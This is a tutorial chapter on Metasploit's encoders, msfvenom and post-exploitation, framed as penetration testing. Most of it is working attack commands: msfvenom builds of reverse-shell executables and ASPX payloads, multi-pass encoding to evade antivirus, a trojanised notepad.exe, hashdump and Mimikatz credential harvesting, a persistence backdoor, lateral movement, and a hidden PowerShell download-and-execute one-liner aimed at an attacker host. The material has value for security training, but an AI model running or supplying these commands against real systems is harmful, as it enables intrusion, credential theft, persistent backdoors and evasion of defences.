Encoders & Msfvenom: Advanced Exploitation Techniques
Overview
Advanced exploitation techniques enhance the effectiveness of penetration tests by improving stealth, overcoming security defenses, and customizing payloads. This chapter covers the use of encoders, the msfvenom
tool, and post-exploitation workflows to maximize the utility of Metasploit.
Encoders in Metasploit
Purpose of Encoders:
Modify payloads to bypass antivirus (AV) and intrusion detection systems (IDS).
Adapt payloads to specific environments by removing incompatible characters (e.g., null bytes).
Popular Encoders:
Shikata Ga Nai:
Most widely used encoder for x86 architectures.
Translates to "It cannot be helped" in Japanese, reflecting its reliability in bypassing AV.
Example:
msfvenom -e x86/shikata_ga_nai -i 5 -f exe
Other Encoders:
x64/xor_dynamic
: XOR-based encoder for 64-bit payloads.cmd/powershell_base64
: Encodes commands in Base64 for PowerShell environments.
Encoding a Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe
Using msfvenom
What is msfvenom?
A tool for generating and encoding custom payloads.
Replaced the older
msfpayload
andmsfencode
utilities.
Key Features:
Generates shellcode, standalone executables, and scripts.
Encodes payloads to evade detection.
Customizable formats for different platforms.
Basic Syntax:
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> > <output_file>
Common Options:
-p
Specifies the payload.
LHOST
Attacker's IP address.
LPORT
Listening port for the payload.
-f
Output format (e.g., exe
, aspx
, raw
).
-e
Encoder to use.
-i
Number of encoding iterations.
Examples of msfvenom Usage
Generate a Reverse Shell for Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > reverse_shell.exe
Create a Web Exploit (ASP.NET):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f aspx > exploit.aspx
Encode a Payload with Shikata Ga Nai:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f elf > payload.elf
Custom Payload with Bad Character Exclusion:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=1337 -b "\x00\x0a\x0d" -f exe > clean_payload.exe
Post-Exploitation Techniques
Once an exploit succeeds, post-exploitation focuses on maintaining access, gathering information, and preparing for further attacks.
Privilege Escalation:
Use
local_exploit_suggester
to identify potential privilege escalation exploits.use post/multi/recon/local_exploit_suggester set SESSION <session_id> run
Gathering Credentials:
Extract password hashes or cleartext credentials:
meterpreter > hashdump
Use tools like Mimikatz for advanced credential harvesting:
meterpreter > load mimikatz mimikatz_command -f "sekurlsa::logonpasswords"
Persistence:
Create a persistent backdoor on the target system:
use exploit/windows/local/persistence set SESSION <session_id> set LPORT 4445 run
Data Exfiltration:
Download files from the target system:
meterpreter > download <target_file> <local_path>
Lateral Movement:
Use post-exploitation modules to pivot to other systems in the network:
use auxiliary/scanner/smb/smb_login
Bypassing AV and IDS
Techniques for Evasion:
Encoding with msfvenom:
Use multiple iterations of encoding to obfuscate payloads:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -e x86/shikata_ga_nai -i 10 -f exe > stealth_payload.exe
Template Injection:
Embed payloads into legitimate executables:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=8080 -x notepad.exe -k -f exe > infected_notepad.exe
Memory-Only Execution:
Leverage in-memory execution techniques to avoid writing files to disk.
Obfuscation:
Use PowerShell or scripting techniques to hide payload execution:
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker_IP>/payload.ps1')"
Command Cheatsheet
msfvenom
Generate and encode payloads.
use post/multi/recon/local_exploit_suggester
Suggest privilege escalation exploits.
meterpreter > hashdump
Extract password hashes from the target.
meterpreter > load mimikatz
Load Mimikatz for credential harvesting.
meterpreter > download <file>
Download files from the target system.
msfconsole -q
Launch Metasploit in quiet mode.